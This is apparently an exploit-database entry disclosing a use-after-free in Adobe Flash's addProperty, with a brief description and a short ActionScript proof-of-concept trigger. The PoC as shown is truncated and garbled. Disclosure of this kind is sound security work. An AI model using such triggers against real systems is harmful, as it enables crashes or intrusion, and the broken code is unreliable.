Adobe Flash - addProperty Use-After-Free

ID 1337DAY-ID-26015
Type zdt
Reporter Google Security Research
Modified 2016-05-17T00:00:00


Exploit for multiple platform in category dos / poc

There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined, and the watch deleted the MovieClip, it is used after it is freed.
A minimal PoC follows:
var t = this.createEmptyMovieClip( "t", 1);"a", func);
t.addProperty("a", func, func);
function func(){
A sample fla and swf are attached.
Proof of Concept:

# [2018-01-08]  #